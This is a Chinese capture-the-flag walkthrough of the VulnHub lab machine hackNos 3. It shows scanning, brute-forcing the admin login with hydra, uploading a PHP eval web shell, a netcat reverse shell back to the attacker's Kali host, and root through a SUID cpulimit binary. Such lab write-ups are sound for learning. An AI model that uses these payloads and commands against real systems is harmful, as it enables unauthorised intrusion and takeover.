0x01靶机介绍
项目 | Value |
---|---|
项目地址 | https://www.vulnhub.com/entry/hacknos-os-hacknos-3,410/ |
镜像链接 | https://download.vulnhub.com/hacknos/Os-hackNos-3.ova |
作者 | Rahul Gehlaut |
发布日期 | 2019年12月14日 |
系列 | hackNos |
难度 | 中等 |
目的 | 获取root权限中的flag |
0x02靶机搭建
工具:VirtualBox7.0
镜像:Os-hackNos-3.ova
搭建方式:
1.管理–>导入虚拟机–>Os-hackNos-3.ova–> Finish
2.设置–>网络–>混杂模式改为全部允许(顺带记下mac地址方便寻找虚拟机):
3.开启我们的攻击机kali(和靶机一样桥接同一个网卡)和靶机
桥接网段:192.168.3.0/24
kali的IP地址:192.168.3.59
0x03渗透流程
一、信息收集
1.主机发现
这里也试试新方法:
netdiscover -i eth0 -r 192.168.3.0/24
-i eth0:指定要使用的网络接口
-r :指定要扫描的IP地址范围
2.查看端口
nmap -sV -p- 192.168.3.89
访问80端口瞅一眼,Ctrl+u看了下没什么东西:
http://192.168.3.89:80
3.目录扫描
网上学的新方法:
gobuster dir -u http://192.168.3.89 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
访问:http://192.168.3.89/websec/
页面有个邮箱,不知道有没有用,先记一下:
contact@hacknos.com
在扫一下二级目录发现一个登陆界面
gobuster dir -u http://192.168.3.89/websec -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
http://192.168.3.89/websec/admin
二、开始攻击
(1) 爆破web密码
用刚刚的邮箱试一下弱口令吧
contact@hacknos.com
123456/contact/admin
失败,尝试爆破
先使用cewl爬取网页的单词并制作成一个字典
cewl http://192.168.3.89/websec/ > cewl.txt
然后使用hydra进行爆破密钥
hydra -l contact@hacknos.com -P cewl.txt 192.168.3.89 http-post-form "/websec/admin:username=^USER^&password=^PASS^:Wrong email"
-l: 指定要破解的用户名
-P: 指定密码列表文件的路径
http-post-form : 指定要攻击的Web应用程序的登录页面和表单数据,USER 和 PASS 是占位符,Wrong email 是错误消息,如果登录失败则返回此消息。
使用账号密码登陆
用户名:contact@hacknos.com
密码 :Securityx
(2) getshell
此处存在上传点
这里上传一句话木马文件shell.php
文件内容为:
<?php @eval(&_POST['cmd']);?>
尝试访问http://192.168.3.89/websec/themes/gila-blog/shell.php
回显没有权限访问。这里将themes目录下的./htaccess文件清空
再次访问显白,蚁剑连接成功getshell
http://192.168.3.89/websec/themes/gila-blog/shell.php
(3) 提权
可以看到这里是低权限www,我们尝试反弹shell
kali开启监听:
nc -lvvp 7777 //命令回显
nc -lvvp 6666 //命令执行
蚁剑终端执行:
nc 192.168.3.59 6666|/bin/bash|nc 192.168.3.59 7777
6666执行整个交互式shell(方便)
python -c 'import pty; pty.spawn("/bin/bash")
6666执行查看具有suid权限的文件,发现可以使用cpulimit提权:
find /usr/bin -type f -perm -u=s 2>/dev/null
这里cpulimit提权方法很多,使用一个最简单的进行即可
cpulimit -l 100 -f -- /bin/sh -p
id
cd /root
cat root.txt
参考文章:
https://www.cnblogs.com/bingekong/articles/16816364.html